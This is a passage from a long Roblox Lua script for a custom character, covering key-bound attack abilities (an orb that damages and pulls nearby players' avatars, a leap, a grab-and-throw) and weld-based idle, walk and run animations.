  4839. cnOrb=nwPrt(char,Vector3.new(1,1,1),larm.CFrame*CFrame.new(0,-3.4,-0.1),"Really black")
  4840. debris:AddItem(cnOrb,50)
  4841. cnOrb.Mesh.MeshType=3
  4842. table.insert(orbt,cnOrb)
  4843. table.insert(stlt,cnOrb)
  4844. local nt=0
  4845. for i=0,5,0.02 do
  4846. nt=nt+1
  4847. cns=i
  4848. if nt>=2 then
  4849. nt=0
  4850. local cho=nwPrt(mod3,Vector3.new(2,2,2),cnOrb.CFrame*CFrame.Angles(math.rad(math.random(-180,180)),math.rad(math.random(-180,180)),math.rad(math.random(-180,180)))*CFrame.new(0,5+cns,0),"Really black")
  4851. debris:AddItem(cho,1)
  4852. cho.Mesh.MeshType=3
  4853. table.insert(chot,cho)
  4854. end
  4855. cnOrb.CFrame=larm.CFrame*CFrame.new(0,-3.4-(cns/2),-0.1)
  4856. cnOrb.Mesh.Scale=Vector3.new(i,i,i)
  4857. wait()
  4858. end
  4859. for i = 1, 14 do
  4860. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,1.4,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-90)), 0.6)
  4861. if Debounces.on == false then end
  4862. rs:wait()
  4863. end
  4864. coroutine.wrap(function()
  4865. for i = 1, 20 do
  4866. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(30)), 0.45)
  4867. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2,.8,-.3)*CFrame.Angles(math.rad(70),math.rad(20),math.rad(50)), 0.6)
  4868. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(0),math.rad(20),0), 0.5)
  4869. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(-40), math.rad(-20), 0), 0.5)
  4870. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.15, -3, -0.4) * CFrame.Angles(math.rad(60), math.rad(20), math.rad(-10)), 0.5)
  4871. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.15, -3, 0.4) * CFrame.Angles(math.rad(0), math.rad(-10), math.rad(10)), 0.5)
  4872. if Debounces.on == false then end
  4873. rs:wait()
  4874. end
  4875. end)()
  4876. wait(0.1)
  4877. stlt={}
  4878. local ry,ht,ps=newRay(root.CFrame*CFrame.new(0,0,-4),root.CFrame*CFrame.new(0,0,-4)*CFrame.Angles(math.rad(-5),0,0)*CFrame.new(0,0,-2),160,{char})
  4879. cnOrb.CFrame=root.CFrame*CFrame.new(0,0,-4)*CFrame.Angles(math.rad(-5),0,0)
  4880. local nt=0
  4881. for i=0,160,3 do
  4882. cnOrb.CFrame=cnOrb.CFrame*CFrame.new(0,0,-3)
  4883. nt=nt+1
  4884. if nt>=6 then
  4885. nt=0
  4886. local cfx=nwPrt(mod3,Vector3.new(1,1,1),cnOrb.CFrame*CFrame.new(0,0,2)*CFrame.Angles(math.rad(90),0,0),"Really black")
  4887. cfx.Mesh.MeshId="rbxassetid://20329976"
  4888. cfx.Transparency=0.4
  4889. table.insert(cfxt,cfx)
  4890. debris:AddItem(cfx,1)
  4891. end
  4892. if (cnOrb.Position-ps).magnitude<6 then
  4893. break
  4894. end
  4895. wait()
  4896. end
  4897. orbt={}
  4898.  
  4899. for i=0,1,0.1 do
  4900. local cs=cnOrb.Mesh.Scale
  4901. cnOrb.Mesh.Scale=Vector3.new(Tween(cs.X,10,i),Tween(cs.Y,10,i),Tween(cs.Z,10,i))
  4902. wait()
  4903. end
  4904. local ofx=nwPrt(cnOrb,Vector3.new(1,1,1),cnOrb.CFrame,"Really black")
  4905. ofx.Transparency=0.5
  4906. ofx.Mesh.MeshType=3
  4907. ofx.Mesh.Scale=Vector3.new(30,30,30)
  4908. for _,v in pairs(game:service"Players":GetChildren()) do
  4909. pcall(function()
  4910. for _,c in pairs(v.Character:GetChildren()) do
  4911. if v~=p and c:IsA("Part") and (cnOrb.CFrame.p-c.CFrame.p).magnitude<60 and (cnOrb.CFrame.p-c.CFrame.p).magnitude>15 then
  4912. local hrp=v.Character:FindFirstChild("HumanoidRootPart")
  4913. hrp.Velocity=CFrame.new(hrp.CFrame.p,(cnOrb.CFrame*CFrame.new(0,10,0)).p).lookVector*150
  4914. end
  4915. end
  4916. end)
  4917. end
  4918. for i=0,1,0.05 do
  4919. local cs=cnOrb.Mesh.Scale
  4920. cnOrb.Mesh.Scale=Vector3.new(Tween(cs.X,0.1,i),Tween(cs.Y,0.1,i),Tween(cs.Z,0.1,i))
  4921. local ofs=ofx.Mesh.Scale
  4922. ofx.Mesh.Scale=Vector3.new(Tween(ofs.X,0.1,i),Tween(ofs.Y,0.1,i),Tween(ofs.Z,0.1,i))
  4923. ofx.Transparency=Tween(ofx.Transparency,1,i)
  4924. wait()
  4925. end
  4926. ofx:Destroy()
  4927. cnOrb.CFrame=CFrame.new(cnOrb.Position)*CFrame.new(0,10,0)
  4928. local cnfx=nwPrt(cnOrb,Vector3.new(1,1,1),cnOrb.CFrame,"Really black")
  4929. cnfx.Mesh.MeshType=3
  4930. cnOrb.Transparency=0.05
  4931. local cnr=nwPrt(cnOrb,Vector3.new(1,1,1),cnOrb.CFrame,"Really black")
  4932. cnr.Mesh.MeshType=3
  4933. local rn1=nwPrt(cnOrb,Vector3.new(1,1,1),cnOrb.CFrame*CFrame.Angles(math.rad(90),0,0),"Really black")
  4934. rn1.Transparency=1
  4935. rn1.Mesh.MeshId="rbxassetid://3270017"
  4936. local rn2=nwPrt(cnOrb,Vector3.new(1,1,1),cnOrb.CFrame,"Really black")
  4937. rn2.Transparency=1
  4938. rn2.Mesh.MeshId="rbxassetid://3270017"
  4939. local nt=0
  4940. local cs=nil
  4941. for i=0,1,0.05 do
  4942. cs=cnOrb.Mesh.Scale
  4943. cnOrb.Mesh.Scale=Vector3.new(Tween(cs.X,100,i),Tween(cs.Y,100,i),Tween(cs.Z,100,i))
  4944. local fs=cnfx.Mesh.Scale
  4945. cnfx.Mesh.Scale=Vector3.new(Tween(fs.X,120,i),Tween(fs.Y,120,i),Tween(fs.Z,120,i))
  4946. cnfx.Transparency=cnfx.Transparency+0.05
  4947. rn1.Mesh.Scale=Vector3.new(Tween(fs.X,120,i),Tween(fs.Y,120,i),Tween(fs.Z,60,i))
  4948. rn2.Mesh.Scale=Vector3.new(Tween(fs.X,120,i),Tween(fs.Y,120,i),Tween(fs.Z,60,i))
  4949. rn1.CFrame=rn1.CFrame*CFrame.Angles(math.rad(10),math.rad(6),math.rad(3))
  4950. rn2.CFrame=rn2.CFrame*CFrame.Angles(math.rad(10),math.rad(6),math.rad(3))
  4951. rn1.Transparency=Tween(rn1.Transparency,0.8,i)
  4952. rn2.Transparency=Tween(rn2.Transparency,0.8,i)
  4953. local rs=cnr.Mesh.Scale
  4954. cnr.Mesh.Scale=Vector3.new(Tween(rs.X,10,i),Tween(rs.Y,10,i),Tween(rs.Z,10,i))
  4955. nt=nt+1
  4956. if nt>=6 then
  4957. local pls={}
  4958. for _,v in pairs(game.Players:GetChildren()) do
  4959. table.insert(pls,v)
  4960. end
  4961. local ry2,ht2,ps2=newRay(cnOrb.CFrame,cnOrb.CFrame*CFrame.new(0,-1,0),1000,pls)
  4962. local pffx=nwPrt(mod3,Vector3.new(1,1,1),CFrame.new(ps2)*CFrame.new(0,10,-12),"Really black")
  4963. pffx.Mesh.MeshId="rbxassetid://20329976"
  4964. pffx.Mesh.Scale=Vector3.new(cs.X,cs.Y/5,cs.Z)
  4965. debris:AddItem(pffx,2)
  4966. table.insert(pfxt,pffx)
  4967. nt=0
  4968. end
  4969. wait()
  4970. end
  4971. local int=0
  4972. coroutine.wrap(function()
  4973. for i=1,500 do
  4974. rn1.CFrame=rn1.CFrame*CFrame.Angles(math.rad(10),math.rad(5),math.rad(5))
  4975. rn2.CFrame=rn2.CFrame*CFrame.Angles(math.rad(10),math.rad(5),math.rad(5))
  4976. nt=nt+1
  4977. int=int+1
  4978. local htd={p}
  4979. for _,v in pairs(game:service"Players":GetChildren()) do
  4980. pcall(function()
  4981. for _,c in pairs(v.Character:GetChildren()) do
  4982. if c:IsA("Part") and not inT(v,htd) and (cnOrb.CFrame.p-c.CFrame.p).magnitude<50 then
  4983. v.Character:FindFirstChild("Humanoid").Health=v.Character:FindFirstChild("Humanoid").Health-2
  4984. v.Character:FindFirstChild("HumanoidRootPart").Velocity=Vector3.new(0,0,0)
  4985. table.insert(htd,v)
  4986. end
  4987. end
  4988. end)
  4989. end
  4990. htd={p}
  4991. if int>=6 then
  4992. for _,v in pairs(game:service"Players":GetChildren()) do
  4993. pcall(function()
  4994. for _,c in pairs(v.Character:GetChildren()) do
  4995. if c:IsA("Part") and not inT(v,htd) and (cnOrb.CFrame.p-c.CFrame.p).magnitude<50 then
  4996. table.insert(htd,v)
  4997. local hfx=nwPrt(mod3,Vector3.new(1,1,1),c.CFrame*CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2)),"Really black")
  4998. hfx.Mesh.Scale=Vector3.new(2,2,2)
  4999. hfx.Mesh.MeshType=3
  5000. debris:AddItem(hfx,2)
  5001. coroutine.wrap(function()
  5002. pcall(function()
  5003. for i=0,1,0.05 do
  5004. pcall(function()
  5005. local hs=hfx.Mesh.Scale
  5006. hfx.CFrame=Lerp(hfx.CFrame,cnOrb.CFrame,i)
  5007. hfx.Mesh.Scale=Vector3.new(Tween(hs.X,0.1,i),Tween(hs.Y,0.1,i),Tween(hs.Z,0.1,i))
  5008. end)
  5009. wait()
  5010. end
  5011. hfx:Destroy()
  5012. end)
  5013. end)()
  5014. end
  5015. end
  5016. end)
  5017. end
  5018. int=0
  5019. end
  5020. if nt>=4 then
  5021. local pls={}
  5022. for _,v in pairs(game.Players:GetChildren()) do
  5023. table.insert(pls,v)
  5024. end
  5025. local ry2,ht2,ps2=newRay(cnOrb.CFrame,cnOrb.CFrame*CFrame.new(0,-1,0),1000,pls)
  5026. local pffx=nwPrt(mod3,Vector3.new(1,1,1),CFrame.new(ps2)*CFrame.new(0,10,-12),"Really black")
  5027. pffx.Transparency=0.4
  5028. pffx.Mesh.MeshId="rbxassetid://20329976"
  5029. pffx.Mesh.Scale=Vector3.new(cs.X-10,cs.Y/5,cs.Z-10)
  5030. debris:AddItem(pffx,2)
  5031. table.insert(pfxt,pffx)
  5032. nt=0
  5033. end
  5034. wait()
  5035. end
  5036. cnOrb:Destroy()
  5037. cnfx:Destroy()
  5038. for _,v in pairs(mod3:GetChildren()) do
  5039. v:Destroy()
  5040. end
  5041. orbt={}
  5042. stlt={}
  5043. chot={}
  5044. cfxt={}
  5045. pfxt={}
  5046. end)()
  5047. if Debounces.CanAttack == false then
  5048. Debounces.CanAttack = true
  5049. Debounces.NoIdl = false
  5050. Debounces.on = false
  5051. end
  5052. end
  5053. end
  5054. end)
  5055. ----------------------------------------------------
  5056. mouse.KeyDown:connect(function(key)
  5057. if key == "m" then
  5058. if Debounces.CanAttack == true then
  5059. Debounces.CanAttack = false
  5060. Debounces.on = true
  5061. Debounces.NoIdl = true
  5062. --[[x = Instance.new("Sound",char)
  5063. x.SoundId = "http://www.roblox.com/asset/?id=169445572"
  5064. x.Looped = false
  5065. x.Pitch = 1.1
  5066. x.Volume = 1
  5067. x:Play()
  5068. x2 = Instance.new("Sound",char)
  5069. x2.SoundId = "http://www.roblox.com/asset/?id=169380495"
  5070. x2.Looped = false
  5071. x2.Pitch = .7
  5072. x2.Volume = 1
  5073. wait(.1)
  5074. x:Play()
  5075. x2:Play()
  5076. for i = 1, 20 do
  5077. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,0.6,-.2) *CFrame.Angles (math.rad (45),math.rad(0),math.rad(32)), 0.2)
  5078. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,1,0)*CFrame.Angles(math.rad (0),math.rad(0),math.rad(-20)), 0.2)
  5079. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.4)*CFrame.Angles(math.rad (- 8),math.rad(-40), math.rad(-8)),0.2)
  5080. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -3.2, 0) * CFrame.Angles (math.rad (-50), math.rad(40), math.rad(0)), 0.2)
  5081. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.8, .4, -1.6) * CFrame.Angles (math.rad (30), 0, math.rad(20)), 0.2)
  5082. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.6, -2, 0) * CFrame.Angles (math.rad(- 10), math.rad(-40), math.rad(0)), 0.2)
  5083. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.3, -1.1) * CFrame.Angles(math.rad(-60), math.rad(-90), math.rad(0)), 0.4)
  5084. if Debounces.on == false then break end
  5085. wait()
  5086. x:Destroy()
  5087. x2:Destroy()
  5088. end
  5089. wait(1)]]--
  5090. local rng = Instance.new("Part", char)
  5091. rng.Anchored = true
  5092. rng.BrickColor = BrickColor.new("Really black")
  5093. rng.CanCollide = false
  5094. rng.FormFactor = 3
  5095. rng.Name = "Ring"
  5096. rng.Size = Vector3.new(1, 1, 1)
  5097. rng.Transparency = 0.35
  5098. rng.TopSurface = 0
  5099. rng.BottomSurface = 0
  5100. rng.Position = torso.Position - Vector3.new(0,5,0)
  5101. rng.CFrame = rng.CFrame * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0))
  5102. local rngm = Instance.new("SpecialMesh", rng)
  5103. rngm.MeshId = "http://www.roblox.com/asset/?id=3270017"
  5104. rngm.Scale = Vector3.new(1, 1, 2)
  5105. x = Instance.new("Sound",char)
  5106. x.SoundId = "http://www.roblox.com/asset/?id=169445602"
  5107. x.Looped = false
  5108. x.Pitch = .7
  5109. x.Volume = 1
  5110. x:Play()
  5111. coroutine.wrap(function()
  5112. for i = 1, 60, 2 do
  5113. rngm.Scale = Vector3.new(2 + i*2, 2 + i*2, 1)
  5114. rng.Transparency = i/60
  5115. wait()
  5116. end
  5117. wait()
  5118. rng:Destroy()
  5119. end)()
  5120. hum.WalkSpeed = 100
  5121. BV = Instance.new("BodyVelocity", torso)
  5122. BV.maxForce = Vector3.new(0,200000,0)
  5123. BV.P = 240000
  5124. BV.velocity = Vector3.new(0,700,0)
  5125. for i = 1, 20 do
  5126. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0)*CFrame.Angles(math.rad(20),math.rad(0), math.rad(0)),0.7)
  5127. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(-16), math.rad(0), math.rad(0)), 0.7)
  5128. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 1, 0) * CFrame.Angles(math.rad(40), 0, math.rad(-20)), 0.7)
  5129. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 1, 0) * CFrame.Angles(math.rad(-40), math.rad(0), math.rad(20)), 0.7)
  5130. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -1.8, .2) * CFrame.Angles(math.rad(-10), 0, 0), 0.7)
  5131. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -1.5, -2) * CFrame.Angles(math.rad(0), 0, 0), 0.7)
  5132. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5133. if Debounces.on == false then break end
  5134. wait()
  5135. end
  5136. x:Destroy()
  5137. BV:Destroy()
  5138. --[[for i = 1, 30 doc
  5139. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 1.5, 0)*CFrame.Angles(math.rad(-14),math.rad(0), math.rad(0)),0.3)
  5140. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(math.rad(-16), math.rad (0), math.rad(0)), 0.3)
  5141. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5, 0.5, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.3)
  5142. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5, 0.5, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.3)
  5143. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -.4, -1) * CFrame.Angles(math.rad(20), 0, 0), 0.3)
  5144. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -.8, -.6) * CFrame.Angles(math.rad(-30), 0, 0), 0.3)
  5145. if Debounces.on == false then break end
  5146. wait()
  5147. end]]--
  5148. if (torso.Velocity*Vector3.new(1, 1, 1)).magnitude > 1 then
  5149. for i = 1, 30 do
  5150. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, 0)*CFrame.Angles(math.rad(-14),math.rad(0), math.rad(0)),0.3)
  5151. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.6, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)), 0.3)
  5152. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 1.4, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-120)), 0.3)
  5153. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 1.4, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(120)), 0.3)
  5154. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, .4) * CFrame.Angles(math.rad(-20), math.rad(0), math.rad(0)), 0.2)
  5155. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -2, -1) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(0)), 0.2)
  5156. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5157. if Debounces.on == false then break end
  5158. wait()
  5159. end
  5160. end
  5161. Debounces.on = false
  5162. Debounces.NoIdl = false
  5163. local ry,ht,ps=nil,nil,nil
  5164. while ht==nil do
  5165. ry,ht,ps=newRay(root.CFrame*CFrame.new(0,-2,0),root.CFrame*CFrame.new(0,-3,0),4.1,{char})
  5166. wait()
  5167. end
  5168. z = Instance.new("Sound",char)
  5169. z.SoundId = "rbxassetid://142070127"
  5170. z.Volume = 1
  5171. wait(.1)
  5172. z:Play()
  5173. Landing()
  5174. hum.WalkSpeed = 8
  5175. if Debounces.CanAttack == false then
  5176. Debounces.CanAttack = true
  5177. end
  5178. end
  5179. end
  5180. end)
  5181. ----------------------------------------------------
  5182. Grab = false
  5183. mouse.KeyDown:connect(function(key)
  5184. if key == "z" then
  5185. Debounces.on = true
  5186. Debounces.NoIdl = true
  5187. if Grab == false then
  5188. gp = nil
  5189. con1=larm.Touched:connect(function(hit) -- this is grab
  5190. ht = hit.Parent
  5191. hum1=ht:FindFirstChild('Humanoid')
  5192. if hum1 ~= nil then
  5193. hum1.PlatformStand=true
  5194. gp = ht
  5195. Grab = true
  5196. asd=weld5(larm,ht:FindFirstChild("Torso"),CFrame.new(0,-3.3,0),CFrame.new(0,0,0))
  5197. asd.Parent = larm
  5198. asd.Name = "asd"
  5199. asd.C0=asd.C0*CFrame.Angles(math.rad(-90),0,0)
  5200. con1:disconnect()
  5201. elseif hum1 ~= nil then
  5202. con1:disconnect()
  5203. wait() return
  5204. end
  5205. end)
  5206. for i = 1, 18 do
  5207. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(36)), 0.2)
  5208. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.65,.9,-.5)*CFrame.Angles(math.rad(70),math.rad(0),math.rad(20)), 0.2)
  5209. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0), 0.2)
  5210. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.8, 0) * CFrame.Angles(math.rad(-60), math.rad(0), 0), 0.2)
  5211. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, -.6) * CFrame.Angles(math.rad(60), math.rad(0), math.rad(0)), 0.2)
  5212. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, -.6) * CFrame.Angles(math.rad(60), math.rad(0), math.rad(0)), 0.2)
  5213. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.3, -1.1) * CFrame.Angles(math.rad(-60), math.rad(-90), math.rad(0)), 0.9)
  5214. if Debounces.on == false then break end
  5215. wait()
  5216. end
  5217. con1:disconnect()
  5218. Debounces.on = false
  5219. Debounces.NoIdl = false
  5220. elseif Grab == true then
  5221. Grab = false
  5222. for i = 1, 20 do
  5223. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)), 0.2)
  5224. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.6, .9, -.4)*CFrame.Angles(math.rad(170),math.rad(0),math.rad(-20)), 0.1)
  5225. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0), 0.2)
  5226. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(0), 0), 0.2)
  5227. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.2)
  5228. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.2)
  5229. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  5230. if Debounces.on == false then end
  5231. wait()
  5232. end
  5233. if gp ~= nil then
  5234. for i,v in pairs(larm:GetChildren()) do
  5235. if v.Name == "asd" and v:IsA("Weld") then
  5236. v:Remove()
  5237. end
  5238. end
  5239. bv = Instance.new("BodyVelocity",gp:FindFirstChild("Torso"))
  5240. bv.maxForce = Vector3.new(400000, 400000, 400000)
  5241. bv.P = 125000
  5242. bv.velocity = char.Head.CFrame.lookVector * 200
  5243. for i = 1, 12 do
  5244. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-2.6, .9, -.75)*CFrame.Angles(math.rad(30),math.rad(0),math.rad(20)), 0.5)
  5245. if Debounces.on == false then end
  5246. wait()
  5247. end--
  5248. ht=nil
  5249. Spawn(function()
  5250. wait(0.5)
  5251. bv:Destroy()
  5252. end)
  5253. Debounces.on = false
  5254. Debounces.NoIdl = false
  5255. elseif ht == nil then wait()
  5256. Grab = false
  5257. Debounces.on = false
  5258. Debounces.NoIdl = false
  5259. end
  5260. end
  5261. end
  5262. end)
  5263. ----------------------------------------------------
  5264. mouse.KeyDown:connect(function(key)
  5265. if string.byte(key) == 52 then
  5266. char.Humanoid.WalkSpeed = 21
  5267. end
  5268. end)
  5269. mouse.KeyUp:connect(function(key)
  5270. if string.byte(key) == 52 then
  5271. char.Humanoid.WalkSpeed = 5
  5272. end
  5273. end)
  5274. ----------------------------------------------------
  5275. Change = false
  5276. mouse.KeyDown:connect(function(key)
  5277. if key == "n" then
  5278. if Change == false then
  5279. Change = true
  5280. stanceToggle = "Normal2"
  5281. elseif Change == true then
  5282. Change = false
  5283. stanceToggle = "Normal"
  5284. end
  5285. end
  5286. end)
  5287. ----------------------------------------------------
  5288. local animpose = "Idle"
  5289. local lastanimpose = "Idle"
  5290. local sine = 0
  5291. local change = 1
  5292. local val = 0
  5293. local ffing = false
  5294. local och = 0
  5295. ----------------------------------------------------
  5296. game:GetService("RunService").RenderStepped:connect(function()
  5297. --[[if char.Humanoid.Jump == true then
  5298. jump = true
  5299. else
  5300. jump = false
  5301. end]]
  5302. char.Humanoid.FreeFalling:connect(function(f)
  5303. if f then
  5304. ffing = true
  5305. else
  5306. ffing = false
  5307. end
  5308. end)
  5309. sine = sine + change
  5310. if jumpn == true then
  5311. animpose = "Jumping"
  5312. elseif ffing == true then
  5313. animpose = "Freefalling"
  5314. elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude < 2 then
  5315. animpose = "Idle"
  5316. elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude < 20 then
  5317. animpose = "Walking"
  5318. elseif (torso.Velocity*Vector3.new(1, 0, 1)).magnitude > 20 then
  5319. animpose = "Running"
  5320. end
  5321. if animpose ~= lastanimpose then
  5322. sine = 0
  5323. if Debounces.NoIdl == false then
  5324. if animpose == "Idle" then
  5325. for i = 1, 2 do
  5326. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)), 0.2)
  5327. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-20)), 0.2)
  5328. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0), 0.2)
  5329. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(0, math.rad(0), 0), 0.2)
  5330. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(-10)), 0.2)
  5331. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(0, 0, math.rad(10)), 0.2)
  5332. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  5333. end
  5334. elseif animpose == "Walking" then
  5335. for i = 1, 2 do
  5336. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, .9, 0) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(20)), 0.2)
  5337. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, .9, 0)*CFrame.Angles(0, math.rad(1), math.rad(-10)), 0.2)
  5338. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(-8), math.rad(0), math.rad(0)),0.2)
  5339. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2, 0) * CFrame.Angles(math.rad(-4), 0, math.rad(0)), 0.2)
  5340. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3, -.05) * CFrame.Angles(math.rad(-18), 0, 0), .4)
  5341. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, -.05) * CFrame.Angles(math.rad(-18), 0, 0), .4)
  5342. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  5343. end
  5344. elseif animpose == "Running" then
  5345. for i = 1, 2 do
  5346. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 0.9, .5) * CFrame.Angles(math.rad(-10), math.rad(-40), math.rad(50)), 0.2)
  5347. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 1.2, 0-1*math.cos(sine/4)/2)*CFrame.Angles(math.rad(50-80*math.cos(sine/8)/2), math.rad(0), math.rad(0-70*math.cos(sine/8)/2)), 0.2)
  5348. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(6+8*math.cos(sine/4)/1.8), math.rad(0), math.rad(0)),0.2)
  5349. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1.2+0.2*math.cos(sine/4)/2, 0) * CFrame.Angles(math.rad(-14+4*math.cos(sine/4)/2), 0, math.rad(0)), 0.2)
  5350. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3-0.44*math.cos(sine/8)/2.4, -.15 + math.sin(sine/8)/1.5) * CFrame.Angles(math.rad(-20) + -math.sin(sine/8)/1.7, 0, 0), .4)
  5351. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3+0.44*math.cos(sine/8)/2.4, -.15 + -math.sin(sine/8)/1.5) * CFrame.Angles(math.rad(-20) + math.sin(sine/8)/1.7, 0, 0), .4)
  5352. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5353. end
  5354. rs:wait(2)
  5355. end
  5356. else
  5357. end
  5358. end
  5359. lastanimpose = animpose
  5360. if Debounces.NoIdl == false then
  5361. if animpose == "Idle" then
  5362. if stanceToggle == "Normal" then
  5363. change = 0.5
  5364. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(88+2*math.cos(sine/14)),math.rad(0),math.rad(20)), 0.2)
  5365. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9+0.1*math.cos(sine/14),0)*CFrame.Angles(math.rad(50),math.rad(-30),math.rad(-40-2*math.cos(sine/14))), 0.2)
